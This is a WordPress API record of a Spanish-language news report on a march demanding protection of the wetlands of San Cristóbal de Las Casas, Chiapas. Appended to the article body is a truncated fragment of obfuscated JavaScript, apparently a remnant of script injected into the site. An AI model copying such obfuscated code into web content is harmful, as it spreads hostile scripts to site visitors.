{"id":13968,"date":"2024-02-05T00:23:58","date_gmt":"2024-02-05T00:23:58","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=13968"},"modified":"2024-02-05T00:23:59","modified_gmt":"2024-02-05T00:23:59","slug":"marchan-para-demandar-proteccion-de-los-humedales-de-san-cristobal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=13968","title":{"rendered":"Marchan para demandar protecci\u00f3n de los humedales de San Crist\u00f3bal"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"485\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/925e5798-3d4e-4c79-9244-b18d74e7ef39-1024x485.jpeg\" alt=\"\" class=\"wp-image-13969\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/925e5798-3d4e-4c79-9244-b18d74e7ef39-1024x485.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/925e5798-3d4e-4c79-9244-b18d74e7ef39-300x142.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/925e5798-3d4e-4c79-9244-b18d74e7ef39-768x364.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/925e5798-3d4e-4c79-9244-b18d74e7ef39.jpeg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal<\/p>\n\n\n\n<p>04 de Febrero del 2024. San Crist\u00f3bal de Las Casas.- Una 200 personas pertenecientes al Consejo General de la zona sur y humedales encabezados por Nicol\u00e1s G\u00f3mez Velasco, que lo integran 14 colonias y fraccionamientos, realizaron una marcha peregrinaci\u00f3n que parti\u00f3 del parque central de San Crist\u00f3bal, con direcci\u00f3n al manantial identificado como Navajuelos, ubicado en la zona sur.<\/p>\n\n\n\n<p>En conmemoraci\u00f3n al D\u00eda Internacional de los Humedales, caminaron portando mantas manifest\u00e1ndose en favor de los humedales, caminando por &nbsp;la carretera panamericana, cerca de las instalaciones de Preparatoria del Estado y Conalep salida a Comit\u00e1n, donde intentaron realizar una ceremonia tradicional dentro del manantial pero no pudieron al estar cerrados.<\/p>\n\n\n\n<p>\u201cActualmente estamos atravesando una crisis clim\u00e1tica sin precedentes, pareciera que en San Crist\u00f3bal de Las Casas vivi\u00e9ramos en el desierto de Sonora, en el d\u00eda hace mucho calor llegando a m\u00e1s de 26 grados cent\u00edgrados en pleno invierno y en la noches y madrugadas temperaturas cercanas a los cero grados\u201d, dijeron los voceros durante una manifestaci\u00f3n pac\u00edfica afuera del manantial.<\/p>\n\n\n\n<p>Lamentaron que se cerque con madera en pleno boulevard a la salida a Comit\u00e1n, cerca de las oficinas de ecolog\u00eda del municipio en el parque de los humedales, y se aplanen , rellenen y se venden lotes de terreno \u201ccon tanta impunidad y corrupci\u00f3n de la autoridad. Y el colmo&nbsp; de los colmos en pleno invierno se le prende fuego al humedal de monta\u00f1a, generando el \u00e9xodo de animales, con el fin de lotificar terrenos&nbsp; y hacer nuevos fraccionamientos\u201d.<\/p>\n\n\n\n<p>Dieron a conocer que el pasado 2 de febrero del 2024, pusimos tres denuncias ante la fiscal\u00eda general de la Rep\u00fablica, la fiscal\u00eda ambiental y la procuradur\u00eda ambiental, hablando directamente con los titulares de estas \u00faltimas en un intento de obtener justicia para los humedales.<\/p>\n\n\n\n<p>Pidieron al gobierno federal que cese \u201cel huachicoleo del agua\u201d, ya que no es justo que quienes destruyen los humedales lucren con la necesidad de la gente, del pueblo; \u201cpedimos al gobierno municipal, que frene ya los permisos y autorizaciones de construcci\u00f3n violando la carta urbana, y los cambios&nbsp; del uso del suelo\u201d.<\/p>\n\n\n\n<p>Despu\u00e9s de las acciones de protesta, los manifestantes se dispersaron de las afueras del manantial, y por casi una hora, provocaron el cierre vehicular de la zona.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal 04 de Febrero del 2024. San Crist\u00f3bal de Las Casas.- Una 200 personas pertenecientes al Consejo General de la zona sur y humedales encabezados por Nicol\u00e1s G\u00f3mez Velasco, que lo integran 14 colonias y fraccionamientos, realizaron una marcha peregrinaci\u00f3n que parti\u00f3 del parque central de San Crist\u00f3bal, con direcci\u00f3n al manantial identificado como &hellip;<\/p>\n","protected":false},"author":2,"featured_media":13969,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-13968","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13968","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13968"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13968\/revisions"}],"predecessor-version":[{"id":13970,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13968\/revisions\/13970"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/13969"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13968"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13968"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13968"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}